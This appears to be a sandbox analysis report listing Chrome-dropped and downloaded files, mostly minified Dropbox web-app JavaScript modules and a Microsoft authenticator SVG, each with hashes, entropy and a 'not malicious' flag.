                                                    Preview:..........uV.n$7......iR.+..LN9.oA..5.......nx..S...l..%[.*.)..=.....z.?/.._......|{8.4M........^.~w>=>......t.....~.M;.....,....n~}=-.7........U.<>=.._.O.....y9.>.....y...wR.`8..r..q$.....KR...X.....W.....$g'". W<..$..-.2.....h04.O...|._../.6.)..ax..X...wzT.....2..7....1....C.@8B....d.M..KS8..>... .%=...q....yWF....\..kM.H....<..&.mM..s...%.'G.n..(..h.-.I.S.K...1;..:7.xdvP..y.]....Q$..4.@.2Fp ..Oe.......=.I........F......{....`.............uC..G.....'..E.....dR..g.(.+K.q...?...O.%.@.i..."n...1 .JTm.*S..wM.,../.|H..s.....C.=.B1(.B.f..:K.\.T....c..N...sT..D....T.=..Zt..M2.).FP.h.:.*+A.. ^N-$..U.K..n.u.DZ...d.C....s.n.PI..@.4.pi....G..j.5.7l6....Q$...fs....uD......F...e%..}5.S.s.n".9...e&(_.=..oq..F%L...G].....b.`..hi.S.I.8..Y%hM.|..W....jC.-a..'..%.r..W?...a...H...5.c......v.G..v.G.a....a/.LT.Fv......7.A...@.OcV.......6xcy,l[.wkP..-E...U..J.....*1j....2....C+...?.I.Q.C.kM.n...j..5{HV)I...M.G2o......5.....E_..j.....D...^b..+.U..,K2
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1729)
                                                    Category:dropped
                                                    Size (bytes):1801
                                                    Entropy (8bit):5.064826822734959
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3C6AB39A1071CFF7562D756505B21631
                                                    SHA1:32505680CE5F3250F0C242CDF6804EED6BA7FF46
                                                    SHA-256:3E48BF912440F166B09A2BFEF4F10FF2AC7794BF87FF968BEBBE439CA3C6B9E3
                                                    SHA-512:C6BED89A14AB0668998977AA99790028B41D9F226FE22F065E9BAF7E69FC2E40F9FB5EDA729C822DA459962E13F03174E42F6CFAEB0092C02B805EAB7A7682CD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","./e_file_viewer_static_scl_page_folder"],(function(e,n,a){"use strict";function t(n,a,t,r,o,s=!0){return new Promise((i=>{new Promise((function(n,a){e(["./c_sharing_share_modal_util"],n,a)})).then((function(e){return e.share_modal_util_esnext})).then((e=>{i(e.showShareModal(n,a,t,r,o,s))}))}))}n.asyncShowManageAccessModal=function(e,n,r){return t(e,n,{initialScreen:a.MANAGE_SCREEN,origin:r})},n.asyncShowNewFolderShareModal=function({contentManagerValidateFolderPath:n,defaultBasePath:a,initialContentName:t,isNonUserRelativeContext:r=!1,logShareModalView:o=!0,modalSessionId:s,onCancel:i,onClose:l,onSetContentNameAndSendShareFail:h,onShareClick:d,onSuccessSharing:c,setUrl:u,shareAsConfidential:_=!1,shareButtonLabelOverride:S,shouldCloseImmediately:f,shouldSuppressRedirectToBrowse:m,shouldSyncThisFolder:w,user:P,experiments:g={},automationOptionChecked:M,defaultRecipientAccessLevel:p,shouldEncryptThisFolder:C,skippedAudienceSelection:x,sharePrefillContacts:y,br
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2171)
                                                    Category:dropped
                                                    Size (bytes):2252
                                                    Entropy (8bit):5.243866912978043
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3D0FD20E90685CED51B51D09698EDB97
                                                    SHA1:81AE73505B191867D2C308351EDCEDD340D24AB4
                                                    SHA-256:C8CD85265CB947A5BDED2943C9013228D3C1E306BA2AE0DC42E9CB9762E33426
                                                    SHA-512:C83EF7FE5BB9696907BA959338641F2AE6A2C72E33B6D9ED646C831CFB0AAB311C20098510E102969C18BB71B1BA4AF94C152AE225F47230E8F0B8ECF19FC4D5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.LibraryLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M9.5 9.5H15V11H9.5V9.5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M6 6.25V17.5c0 .85.2 1.465.62 1.88.415.42 1.03.62 1.88.62h10v-1.5h-10c-.4 0-.705-.065-.825-.185-.11-.11-.175-.41-.175-.815 0-.405.065-.705.185-.825.11-.11.41-.175.815-.175h10V4H8.25A2.248 2.248 0 0 0 6 6.25Zm2.25-.75a.748.748 0 0 0-.75.75v8.871a3.698 3.698 0 0 1 1-.121H17V5.5H8.25Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.LightbulbPictogram=e=>n.createElement("svg",{viewBox:
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (928)
                                                    Category:dropped
                                                    Size (bytes):978
                                                    Entropy (8bit):5.130855246537633
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F7A926D604752857AC1E927773C3E196
                                                    SHA1:8EA239495C16F20A01C29135E840BAB23E22F1D6
                                                    SHA-256:F183043BB2EED3204090F9C33DC99B8430361ECDF23AF4AB6BA6B4EED901D669
                                                    SHA-512:20DEA6DAAFD597DC0909EFFB5DC55A1B1C00DD5BA3C5C32C92C7876F93362981BD38D34370116D2420DBC7E211496E63EFA62C40314A2BB589F245C3F8A70F55
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_core_exception"],(function(e,s,t){"use strict";function i(e){return e&&e.__esModule?e:{default:e}}var r=i(s);const n={};function a(e){-1!==e.indexOf("-vfl")||(e=>0===e.indexOf("https://assets.dropbox.com"))(e)||null!=n[e]||(n[e]=!0,t.reportStack(`Non-VFL path detected: ${e}. This usually means that the image doesn't exist and is 404ing; though another possibility is that the image exists but vfl cache busting isn't being applied, which can happen when the url is a relative url, since we generally don't vfl relative urls.`))}class o extends r.default.Component{render(){let e;a(this.props.src),this.props.src.endsWith(".svg")||!this.props.srcHiRes?e=this.props.src:(a(this.props.srcHiRes),e=this.props.srcHiRes+" 2x");const{ref:s,srcHiRes:t,...i}=this.props;return r.default.createElement("img",{srcSet:e,alt:this.props.alt,...i})}}o.displayName="Image",o.defaultProps={alt:""},e.Image=o}));.//# sourceMappingURL=c_ui_image.js-vflfaONlT.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (852)
                                                    Category:downloaded
                                                    Size (bytes):931
                                                    Entropy (8bit):5.158636867887415
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0AE611F410BBCA079E9897448F11ABC8
                                                    SHA1:D2B1E8696B44FE0CFA046BC07FC64E16F21666E3
                                                    SHA-256:ABFD293246639EA70D1B55EDDEF74E772DA6225CA6F121D6DF6EB2904C15F423
                                                    SHA-512:050EC168AF536B2D4AB8C7EEA56854DE9BF704B1F3626248C1AB06B6A385F64E54C5525DD52C089ED720C5337DD26658B407127A3AA8C9E88648F72C2E709484
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_hooks_useTouchInteraction-vflCuYR9B.js
                                                    Preview:define(["exports","react"],(function(e,n){"use strict";e.useTouchInteraction=({onSwipeLeft:e,onSwipeRight:r,onSwipeDown:t,onTap:u})=>{const c=n.useRef(0),a=n.useRef(0),o=n.useRef(0),s=n.useRef(!1),l=n.useRef(!1);return{handleTouchStart:n.useCallback((e=>{const n=e.changedTouches[0];c.current=Date.now(),a.current=n.pageX,o.current=n.pageY,e.touches.length>1&&(s.current=!0)}),[c,a,o,s]),handleTouchEnd:n.useCallback((n=>{const u=n.changedTouches[0];if(s.current)return void(0===n.touches.length&&(s.current=!1));if(Date.now()-c.current>500)return;const i=u.pageX-a.current,h=u.pageY-o.current;if(Math.abs(i)>Math.abs(h)){if(i<=-100)return void(null==e||e());if(i>=100)return void(null==r||r())}else if(h>=50)return void(null==t||t());l.current=!0}),[c,a,o,s,e,r,t]),handleClick:n.useCallback((()=>{l.current&&(null==u||u(),l.current=!1)}),[u,l])}}}));.//# sourceMappingURL=c_file_viewer_hooks_useTouchInteraction.js-vflw3rB-J.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (802)
                                                    Category:dropped
                                                    Size (bytes):874
                                                    Entropy (8bit):5.069542137477292
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9AB12665128B2D031C53B165138FD720
                                                    SHA1:C70A5E6BB863912345C374D5502BB0EB43804018
                                                    SHA-256:F0DEFDA53D809E5DCAD908A597E644D480114F66C1900139F77C7D7E80501740
                                                    SHA-512:01ACFDFB9AF17A13F9BAA035470875D7144AF9140276F31F9D41B93C8606C7FC4E17243FD21C6371259C3E71E0A021600E7788A0D2860AAF37CE3089DDE3208B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./e_data_modules_stormcrow"],(function(e,t,i){"use strict";function a(e,t=0,i=1){return Math.min(Math.max(t,e),i)}const r=(e,a,r,n)=>{const o=t.prepareFileInfo(a,r),h={results:[{preview:e,file:o,err:n}]};i.queryClient.setQueryData(t.createPreviewMetadataQueryKey(o),{apiData:h,pkgData:null})},n=e=>void 0!==i.queryClient.getQueryData(t.createPreviewMetadataQueryKey(e));e.createNormalizedRegion=function(e,t,i){const r=i?i.x:e.left-t.left,n=i?i.y:e.top-t.top;return function({x:e,y:t,width:i,height:r}){return{x:a(e),y:a(t),width:a(i),height:a(r)}}({x:r/t.width,y:n/t.height,width:e.width/t.width,height:e.height/t.height})},e.maybeCopyPreviewMetadataIntoQueryClient=(e,t,i,a)=>{n(t)||r(e,t,i,a)},e.normalizeValue=a,e.setPreviewMetadata=r}));.//# sourceMappingURL=c_queries_utils_preview_metadata.js-vflNaueXs.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2010)
                                                    Category:downloaded
                                                    Size (bytes):2072
                                                    Entropy (8bit):4.891680696653141
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CFBD6A1E2C41D78B78D01BB78108FAF1
                                                    SHA1:361E0AA0D82FC7B22778C00B8B876343837A4EB9
                                                    SHA-256:5E929D7C052F25ECF333F0A112DCACB4A660F60F72E9A81207460653B3A9DC7C
                                                    SHA-512:8223D21104776FE9C68FFB88650193EAF596EB1FCFAEAD0DF9A1E6FBBF7917EE7E79118371EE7EBCE577ED44AD69EF4BBB564ED1266AD10AC6D26C79D3F81BDF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_sharing_content_info-vflz71qHi.js
                                                    Preview:define(["exports"],(function(r){"use strict";function e(r){const e=(r.isFolder?r.targetNsId:r.fileId)||r.fqPath;if(null==e)throw new Error("Not enough fields provided for extras");return e}class t{constructor(r,e){this.extras=r,this.id=e}static createFromParams(r){return new t({exists:!0,...r},e(r))}setNsId(r){const s={...this.extras,targetNsId:r};return new t(s,e(s))}setFQPath(r){const s={...this.extras,fqPath:r};return new t(s,e(s))}isFolder(){return this.extras.isFolder}isFile(){return!this.isFolder()}isFileFolder(){return this.isFolder()&&!this.isSharedFolder()}isSharedFolder(){return Boolean(this.extras.targetNsId)}isTeamSharedFolder(){return this.extras.isTeamSharedFolder}isEncryptedFolder(){return Boolean(this.extras.isEncryptedFolder)}isFolderInsideTeamFolderTree(){return this.extras.isFolderInsideTeamFolderTree}isInSharedFolder(){return Boolean(this.extras.nsId&&this.extras.nsId!==this.extras.userHomeNs)}isNestedSharedFolder(){return this.isInSharedFolder()&&this.isSharedFolde
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3632)
                                                    Category:downloaded
                                                    Size (bytes):3684
                                                    Entropy (8bit):5.125693986552264
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EB885ADDA1BE87485DFFC47E24A94E7D
                                                    SHA1:C4AE073819D35B17E23A4936B10612B6D25A3AC5
                                                    SHA-256:DE78AC331982C4C0EDB05C0C69EA8DC1714076EC1254288F2C0B4797CC13FA58
                                                    SHA-512:7EB1E95E1ED361FE91BF0743F8DE5F9D7618D8238FAA8C088E504112E2119E3FDD682D5BA856D3CD0D267037ABF1B580923A35420988ADED70835813F84E883E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_web-vitals-vfl64ha3a.js
                                                    Preview:define(["exports"],(function(e){"use strict";var n=-1,t=function(e){addEventListener("pageshow",(function(t){t.persisted&&(n=t.timeStamp,e(t))}),!0)},r=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},i=function(){var e=r();return e&&e.activationStart||0},o=function(e,t){var o=r(),a="navigate";return n>=0?a="back-forward-cache":o&&(document.prerendering||i()>0?a="prerender":document.wasDiscarded?a="restore":o.type&&(a=o.type.replace(/_/g,"-"))),{name:e,value:void 0===t?-1:t,rating:"good",delta:0,entries:[],id:"v3-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:a}},a=function(e,n,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){n(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},t||{})),r}}catch(e){}},c=function(e,n,t,r){var i,o;return function(a){n.value>=0&&(a||
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2240)
                                                    Category:downloaded
                                                    Size (bytes):2315
                                                    Entropy (8bit):5.223817707363028
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FADBF57662E041D6EE3438B15CF2A280
                                                    SHA1:011AE53C9751FC8BE8382B164806D839C9554282
                                                    SHA-256:A2F6483596E84E0E579225E25A72953EAB20724FDD1FC73EB52074650C23945B
                                                    SHA-512:E815BD778E9BB0389694C9ADDB9881A41FEC37FF9EEDDE44A56015B5D99DE09838894598C0C31397278717D593AA6E6040E67D090C4C01A527EAD02F8D7BF925
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_zip-vfl-tv1dm.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.CursorLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12.188 6H11V4.5h1.25c.951 0 1.804.231 2.411.839l.089.093c.029-.031.058-.063.089-.093.607-.608 1.46-.839 2.411-.839h1.25V6h-1.25c-.73 0-1.129.178-1.35.4-.222.221-.4.62-.4 1.35v8c0 .73.178 1.129.4 1.35.221.222.62.4 1.35.4h1.25V19h-1.25c-.951 0-1.804-.231-2.411-.839a2.52 2.52 0 0 1-.089-.093 2.52 2.52 0 0 1-.089.093c-.607.608-1.46.839-2.411.839H11v-1.5h1.25c.73 0 1.129-.178 1.35-.4.222-.221.4-.618.4-1.348V7.75c0-.73-.178-1.129-.4-1.35-.221-.222-.62-.4-1.35-.4h-.063Z",fill:"currentColor",vectorEffect:"n
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1581)
                                                    Category:dropped
                                                    Size (bytes):1666
                                                    Entropy (8bit):5.331438308848876
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A541E6384120E7EF2DF09D6B75DF02FB
                                                    SHA1:61624CE652CC02B5D41DC2CA733942DB45599373
                                                    SHA-256:8F2729D775797D70C33AF728805A8F3EC01277AB47A023EEEA8639A69CC057D3
                                                    SHA-512:086E73086F4A414124836AB1FC6F8723946BF1291E7472B24B6FFAA8352CC0975DDED65329151C0CA607AC43F5722616D98BAC27154E31CA771189F8E701443B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.FullscreenExitLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M10 5v5H5V8.5h3.5V5H10Zm9 9v1.5h-3.5V19H14v-5h5ZM5 14v1.5h3.5V19H10v-5H5Zm14-4V8.5h-3.5V5H14v5h5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.PersonCircleLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12 4c-5.159 0-8 2.841-8 8s2.841 8 8 8 8-2.841 8-8-2.841-8-8-8Zm0 1.5c4.374 0 6.5 2.126 6.5 6.5a8.864 8.864 0 0 1-.475 3.053 4.271 4.271 0 0 0-3.125-1.542A4.817 4.817 0 0 0 15.5 11c0-2.542-1.275-4-3.5-4s-3.5 1.458-3.5 4a4.817 4.817 0 0 0 .6 2.511 4.221 4.221 0 0 0-3.12
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (36909)
                                                    Category:downloaded
                                                    Size (bytes):36979
                                                    Entropy (8bit):5.334096844031078
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9C29558333A5E57870AF71758EEE816B
                                                    SHA1:65D2A1B67C98B8234AE148022B38B9CE2BD08604
                                                    SHA-256:A8A943DDA939DA5B7FFD8DAEEEABDB6821BA637652B116B0EFA33095DBC14305
                                                    SHA-512:2D0FB0689BBA21DEF790587CB4B8FEC034F1E74940A8B7D3EE246D0E10AD6A1B73A8D9957BBDEBCC62FE91B19FD11D39CF78418DC82F4173948876EE60AC3B0A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_spectrum_modal_utility_modal-vflnClVgz.js
                                                    Preview:define(["exports","./c_spectrum_button","./e_file_viewer_static_scl_page_folder","react","./c_icon_templates_actionable_index","./c_spectrum_svg_icon_bundle","./c_spectrum_icon_form_index"],(function(e,l,t,a,n,h,c){"use strict";function o(e){if(e&&e.__esModule)return e;var l=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var a=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(l,t,a.get?a:{enumerable:!0,get:function(){return e[t]}})}})),l.default=e,Object.freeze(l)}var d=o(a);const i="mc-no-scroll";function r(){if(!t.exenvExports.canUseDOM)return;document.body.clientWidth<window.innerWidth&&(document.body.style.paddingRight=function(){if(!t.exenvExports.canUseDOM)return 0;const e=document.createElement("div");e.className="scrollbar-measure",document.body.appendChild(e);const l=e.offsetWidth-e.clientWidth;return document.body.removeChild(e),l}()+"px")}function v(){r(),t.exenvExports.canUseDOM&&document.documentElement.classList.add(i)}functio
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (14912)
                                                    Category:downloaded
                                                    Size (bytes):14989
                                                    Entropy (8bit):5.27027142488747
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A044756CB0FD895D8E3905DD9FFE7280
                                                    SHA1:8348624DF76D20A73D0CD0363D8886D33AE93253
                                                    SHA-256:91B9CE8D670B79C6D0B21194FCC0E9D4A69EAC11AA2F0D328C3E5E723AA106D0
                                                    SHA-512:0B36B470F7AA01096D8348790BA64F8840618BAE37BA56778890700C933505213EA7FFBF2C6BE70CEBC00AE7F19503835BF593B9B5EA6FFB35D7C39C86FD6B18
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_api_v2_routes_folders_info_provider-vfloER1bL.js
                                                    Preview:define(["exports","./c_ts_utils","./e_core_exception"],(function(e,t,r){"use strict";var n,a,i;function o(e){const t=i[e];return"string"!=typeof t?e.toString():t[0].toLowerCase()+t.substring(1).replace(/[A-Z]/g,(e=>"_"+e.toLowerCase()))}e.MethodKind=void 0,(n=e.MethodKind||(e.MethodKind={}))[n.Unary=0]="Unary",n[n.ServerStreaming=1]="ServerStreaming",n[n.ClientStreaming=2]="ClientStreaming",n[n.BiDiStreaming=3]="BiDiStreaming",function(e){e[e.NoSideEffects=1]="NoSideEffects",e[e.Idempotent=2]="Idempotent"}(a||(a={})),function(e){e[e.Canceled=1]="Canceled",e[e.Unknown=2]="Unknown",e[e.InvalidArgument=3]="InvalidArgument",e[e.DeadlineExceeded=4]="DeadlineExceeded",e[e.NotFound=5]="NotFound",e[e.AlreadyExists=6]="AlreadyExists",e[e.PermissionDenied=7]="PermissionDenied",e[e.ResourceExhausted=8]="ResourceExhausted",e[e.FailedPrecondition=9]="FailedPrecondition",e[e.Aborted=10]="Aborted",e[e.OutOfRange=11]="OutOfRange",e[e.Unimplemented=12]="Unimplemented",e[e.Internal=13]="Internal",e[e.Un
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (623)
                                                    Category:dropped
                                                    Size (bytes):692
                                                    Entropy (8bit):4.99620368198262
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:06DC5F5C6010EA56935FB534B34E4FBB
                                                    SHA1:7E26558EB96D4F56AFB872DF392DBEBC90DC4484
                                                    SHA-256:F3500654856D494B38AB337F22BB8538C5A20D0E19C29D9F34A586C491CF4833
                                                    SHA-512:B730D7C4BF787694B73FCE12C2F3953B5CBC7DC560F4B4D6683EC4E4ADFB1524B7F969A18413FAD4D25B3902BEC87AECD906DD54ADE04325C75B3D5DE703D7B6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_api_v2_routes_folders_info_provider","./c_security_csrf_hmac"],(function(e,t,r,c){"use strict";async function n(e){const t=r.URI.parse(e).getScheme();if(t&&!["http","https"].includes(t))return"#";const n=new r.URI({scheme:"https",authority:"www.dropbox.com",path:"/referrer_cleansing_redirect"}),i=await c.csrfHmacUrltoken(e);return n.setQuery({url:e,hmac:i}),n}async function i(e,r=window,c=!1){c&&(r.opener=null);const i=await n(e);t.redirect(i,r)}e.get_redirect_uri=n,e.redirect=i,e.safe_open_tab_and_redirect=function(e){i(e,t.unsafe_open_tab(""),!0)}}));.//# sourceMappingURL=c_referrer_cleansing_redirect.js-vflfgMkLe.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                    Category:downloaded
                                                    Size (bytes):2407
                                                    Entropy (8bit):7.900400471609788
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                    SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                    SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                    SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg
                                                    Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (59864)
                                                    Category:dropped
                                                    Size (bytes):60020
                                                    Entropy (8bit):5.26851580555456
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:22F55B57533CBDC40C985816049775E2
                                                    SHA1:75E5DD8415AD163EED3BFF2FD39F239874199B76
                                                    SHA-256:E98FF211DC3FD569B963F49EB4976E6AF5CC9073DC3E5D591B939136F888FAFA
                                                    SHA-512:F3AAE39604D3356921DBA2471144E3F6B786DB990A8AFAAD48822BFD796C7B9D5B9FB02DDDA7810682765A5A4C112B9849B7304CAD00D27300DBD942ADC78201
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","./c_pap-events_sign_save_signature_doc","./c_preview_audio_video_video_editing_strings","./c_preview_audio_video_video_editing_utils","./c_core_i18n","./c_react_query_helpers_queries_file_content_metadata","./c_action_plugins_pdf_edit_action_action","./c_admin_registration_source_constants","./c_google_one_tap_google_one_tap_platform","./c_dig-icons_assets_ui-icon_line_scale","./c_dig-icons_assets_ui-icon_line_placeholder-text","./c_action_plugins_conversion_action_conditions","./c_integrations_hellosign_deep_integration_constants","./c_lodash"],(function(e,a,t,i,s,o,d,l,n,r,g,u,f,c,p,M){"use strict";function m(e){return e&&e.__esModule?e:{default:e}}var S=m(t);const h=e=>{if(a.isBrowseFile(e)&&"read_only"in e&&!e.read_only&&a.isSupportedPreviewType(e.ext)&&!a.isEncryptedFile(e))return e},v=new Set(a.HTMLIFIED_PREVIEW_EXTS);function y(e,t){return!a.isEncryptedFile(e)&&((!t||0!==t.canDownloadRoles.length)&&!!v.has("."+a
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3087)
                                                    Category:downloaded
                                                    Size (bytes):3169
                                                    Entropy (8bit):5.0657311814362105
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9C53B26D9F2BD2E09DB6560691FFF777
                                                    SHA1:E75EEAA5583871DDCA2C187D3EA3042EC90D7791
                                                    SHA-256:B3DE835FF6F8F4129848527A3F8CDE31D009351112A8A8C7B0D01E3E7211D252
                                                    SHA-512:5E21E63DD4709B1140334F5032098C8B6605E1F38E4D01984E5C554866C5A739A14A40E115F9DC60D915161AC740CFBB8A9AF8D99552F835747A598610ADE3C1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_teams_idle_timeout_pagelet.after-display-vflnFOybZ.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","./c_core_i18n","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,t,s,i,r,o,n,c,a,d,h,v,m,p,u,_,I,l){"use strict";const y=["keypress","keydown","click","contextmenu","dblclick","mousemove","scroll","touchmove","touchstart"];var A;!function(e){e[e.Standard=1]="Standard",e[e.Advanced=2]="Advanced"}(A||(A={}));class R{constructor(e){this.userReportedActive=!1,this.userIsActive=!1,this.userMouseIsInFrame=!1,this.attachedFrames=[],this.activityReportMode=A.Advanced,this.activityReportInSec=5,this.detectFramesInSec=-1,this.onActivity=()=>{},this.onE
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (32030)
                                                    Category:dropped
                                                    Size (bytes):86709
                                                    Entropy (8bit):5.367391365596119
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E071ABDA8FE61194711CFC2AB99FE104
                                                    SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                                    SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
